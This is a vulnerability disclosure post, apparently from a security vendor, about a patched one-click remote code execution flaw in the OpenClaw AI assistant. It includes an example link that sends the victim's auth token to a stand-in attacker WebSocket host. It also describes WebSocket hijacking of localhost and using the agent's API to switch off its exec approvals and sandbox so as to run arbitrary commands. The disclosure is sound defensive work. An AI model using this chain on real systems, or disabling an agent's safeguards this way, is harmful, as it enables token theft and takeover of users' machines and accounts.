**
1-Click RCE to Steal Your Moltbot Data and Keys: A Devastating Vulnerability in OpenClaw
**The tech world is abuzz with the news of a critical vulnerability in OpenClaw (formerly Moltbot and ClawdBot), the popular open-source AI personal assistant that has won the trust of over 100,000 developers. This powerful tool not only controls access to vital services like iMessage, WhatsApp, and Slack but also grants unrestricted local computer control. The community has been celebrating its capabilities, but a silent audit by depthfirst General Security Intelligence has uncovered a critical flaw.
**
The Critical Vulnerability: A Logic Gap in the Code
**depthfirst's engine meticulously mapped the full flow of an application's lifecycle and revealed a critical logic gap that can be exploited. This vulnerability lies in the way OpenClaw processes user input, specifically the `gatewayUrl` query parameter in URLs. The code blindly accepts this parameter and persists it to storage, creating a security issue when combined with other operations.
**
The Kill Chain: A Step-by-Step Guide to Exploitation
**The vulnerability can be exploited through a 1-Click Remote Code Execution (RCE) attack. Here's how:
1. **Ingestion**: The `app-settings.ts` file blindly accepts the `gatewayUrl` query parameter in the URL and persists it to storage. 2. **Processing**: The `app-lifecycle.ts` file triggers the `connectGateway()` function immediately after settings (such as the gateway url) are applied. 3. **Protocol Execution**: The `gateway.ts` file automatically bundles the security-sensitive `authToken` into the system's connection handshake to the new gateway.
**
Exploiting the Vulnerability
**To exploit this vulnerability, an attacker can create a malicious link that includes the `gatewayUrl` parameter. When a victim clicks on this link or visits a site that forwards them to the malicious link, the following sequence of events occurs:
1. **The Victim Visits the Malicious Link**: The victim clicks on a link like `http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080`. 2. **Attacker Receives the Auth Token**: The attacker's server receives the authentication token. 3. **Attacker Logs in to the Victim's OpenClaw Instance**: The attacker uses the stolen token to log in to the victim's OpenClaw instance, granting access to personal data and allowing the attacker to perform actions on behalf of the victim.
**
Bypassing Localhost Network Restrictions
**However, this direct exploitation method has three limitations:
* **Same Origin Policy (SOP) Restrictions**: The Same Origin Policy prevents separate origins from fully interacting with each other. * **WebSocket Origin Header Validation**: WebSocket servers are responsible for validating the request's origin and deciding whether to accept the connection. * **Localhost Network Restriction**: Regularly, `attacker.com` cannot make arbitrary client-side requests to `localhost`.
**
Pivoting to Bypass Localhost Network Restrictions
**To overcome these limitations, I discovered a bug that allows Cross-Site WebSocket Hijacking (CSWSH). The OpenClaw's WebSocket server fails to validate the WebSocket origin header, accepting requests from any site. This allows me to perform CSWSH and run JavaScript on the victim's browser to open a connection to `ws://localhost:18789`.
**
Arbitrary Command Execution
**With this setup in place, I can use the API to disable safety features like exec-approvals.json and sandbox containers. This allows me to execute arbitrary commands using the `node.invoke` request.
**
The Vulnerability Has Been Fixed, But Users Must Act
**The OpenClaw team quickly addressed and fixed the issue I reported, releasing a patch that adds a gateway URL confirmation modal and removes the auto-connect-without-prompt behavior. All versions up to v2026.1.24-1 are vulnerable, so it's essential for users to upgrade their OpenClaw and rotate tokens if they suspect theirs may have leaked.
**
depthfirst is Building the Intelligence Layer to Catch Logic Flaws Before Attackers Do
**If you're shipping code, let's talk about how depthfirst can help build the intelligence layer to catch these logic flaws before attackers do. Stay safe!